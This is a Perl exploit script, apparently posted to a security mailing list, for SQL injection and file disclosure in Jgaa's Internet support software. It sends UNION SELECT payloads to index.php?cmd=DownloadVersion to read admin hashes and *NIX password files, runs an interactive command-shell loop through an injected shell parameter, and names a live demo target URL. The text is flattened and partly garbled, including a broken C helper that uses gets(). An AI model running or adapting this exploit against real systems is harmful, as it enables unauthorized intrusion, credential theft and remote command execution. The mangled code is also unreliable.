#!/usr/bin/perl #You can get admin hash,or acces the pass file from the *NIx #with the generated strings with the generator.c program #you have to put in sql specific comands,my example is for #tables and *NIX pass #exploit tested on winxp sp2 # #include # #include # #include # int main() # { char st[1024]; # int le; # printf("Input : "); # gets(st); # for(le=0;le) { $cmd=$_; chomp($cmd); $sploit=LWP::UserAgent->new() or die; $requesting=HTTP::Request->new(GET=>$site.'/index.php?cmd=DownloadVersion&ID=-1/**/UNION/**/SELECT/**/0/*'.$shells.'?&'.$shellcmd.'='.$cmd) or die"\n\n NOT CONNECTED\n"; $re=$sploit->request(requesting); $i=$re->content; $i=~tr/[\n]/[ê]/; if(!$cmd) { print "Enter a command\n\n"; $i=""; } elsif(i=~/failed to open:HTTP request failed!/ || $i=~/:cannot execute the command in / ) { print "\nCould NOT connect to cmd from host \n"; exit; } elsif($i=~/^.WARNING/) { print "\nInvalid command\n\n"; }; if($i=~/(.+).WARNING.(.+).WARNING/) { $last=$1; $last=~tr/[&234;]/[\n]/; print "\n$last\n"; last; } else { print "[shell] \$"; } } } last; sub header() { print q { ================================================================================================================================================================ MSQL injection -file disclosure in Jgaa's Internet PoC:http://support.jgaa.com Demo:http://support.jgaa.com/index.php?cmd=DownloadVersion&ID=-1/**/UNION/**/SELECT/**/0/* ================================================================================================================================================================ } } sub routine() { header(); print q { ====================================================================================================== USAGE: perl exploit.pl EXAMPLE: perl [localhost\][path] exploit.pl [target] ====================================================================================================== }; exit(); } --------------------------------- Yahoo! oneSearch: Finally, mobile search that gives answers, not web links.